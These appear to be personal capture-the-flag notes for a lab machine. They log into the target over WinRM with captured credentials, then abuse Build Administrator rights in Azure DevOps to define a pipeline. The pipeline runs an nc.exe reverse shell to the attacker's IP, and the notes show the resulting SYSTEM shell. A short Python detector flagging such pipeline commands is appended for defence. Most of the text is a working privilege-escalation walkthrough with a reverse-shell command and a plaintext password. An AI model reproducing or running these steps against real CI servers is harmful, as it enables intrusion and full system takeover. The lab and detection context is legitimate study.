11 evil-winrm robisl :5985
$ evil-winrm -i 10.10.10.203 -u robisl -p wolves11
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
# can't find anything new as we've enumerated on box
# using creds on devops.worker.htb
http://devops.worker.htb/ekenas/
new repo: PartsUnlimited
# look at (bottom left) Project Settings > Security >
# robisl is a member of Build Administrators, can define builds using CI pipeline
# exploit using Pipeline
Pipelines > New >
(select where is project hosted): Azure Repo Git
(select repo): PartsUnlimited
(type of pipeline): Starter Pipeline
file: modified.yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml
trigger:
- master
pool: 'Default'
steps:
- script: whoami
  displayName: 'Run a one-line script'
# trigger defines when it runs, usually on commits (and merges); saving the pipeline runs it too
# pool defines the agent pool the pipeline runs on
# steps defines scripts to run
ERROR:The pipeline is not valid. Could not find a pool with name Default. The pool does not exist or has not been authorized for use.
# to find agent-pools
(top-left) Azure DevOps > (bottom-left) Collection Settings > Agent Pools
there is a pool called "Setup"
# modifying and changing to multi line scripts
# try2.yaml
trigger:
- master
pool: 'Setup'
steps:
- script: |
    whoami /priv
    C:\Windows\System32\cmd.exe /c C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 7070
  displayName: 'kashz'
$ nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.203] 51927
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
W:\agents\agent11\_work\9\s>whoami
nt authority\system
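Defender-side check for the abuse above, added here as an example and not part of the original notes: it extracts the commands from `script:` steps in a pipeline YAML and flags the patterns seen in try2.yaml. The rule names, regexes and function names are assumptions, not an Azure DevOps feature.

```python
import re

# Constructed sample: the try2.yaml pipeline from the notes above.
TRY2 = r"""trigger:
- master
pool: 'Setup'
steps:
- script: |
    whoami /priv
    C:\Windows\System32\cmd.exe /c C:\Users\Public\nc.exe -e cmd.exe 10.10.16.7 7070
  displayName: 'kashz'
"""

# Heuristic indicators (assumed rule set, tune per environment).
RULES = {
    "exec-from-user-writable-dir": re.compile(r"(?i)\\users\\public\\|\\windows\\temp\\|%temp%"),
    "shell-bound-to-socket": re.compile(r"(?i)\s-e\s+(cmd|powershell)(\.exe)?\b"),
    "raw-ip-and-port": re.compile(r"\b\d{1,3}(\.\d{1,3}){3}[ :]\d{2,5}\b"),
}

def script_lines(yaml_text):
    """Yield command lines from '- script:' steps (inline or block-scalar form)."""
    in_block, body_indent = False, None
    for line in yaml_text.splitlines():
        indent = len(line) - len(line.lstrip())
        if in_block and line.strip():
            if body_indent is None:
                body_indent = indent      # first body line fixes the block indentation
            if indent >= body_indent:
                yield line.strip()
                continue
            in_block = False              # a dedent ends the block scalar
        m = re.match(r"\s*-\s*script:\s*(.*)$", line)
        value = m.group(1).strip() if m else ""
        if value in ("|", ">", "|-", ">-"):
            in_block, body_indent = True, None
        elif value:
            yield value

def audit(yaml_text):
    """Return a sorted list of (rule, command) findings for one pipeline file."""
    return sorted((name, cmd) for cmd in script_lines(yaml_text)
                  for name, rx in RULES.items() if rx.search(cmd))

if __name__ == "__main__":
    for name, cmd in audit(TRY2):
        print(f"{name}: {cmd}")
```

Run it over pipeline files on commit or in review; the starter pipeline's `whoami` step produces no findings, while try2.yaml trips all three rules.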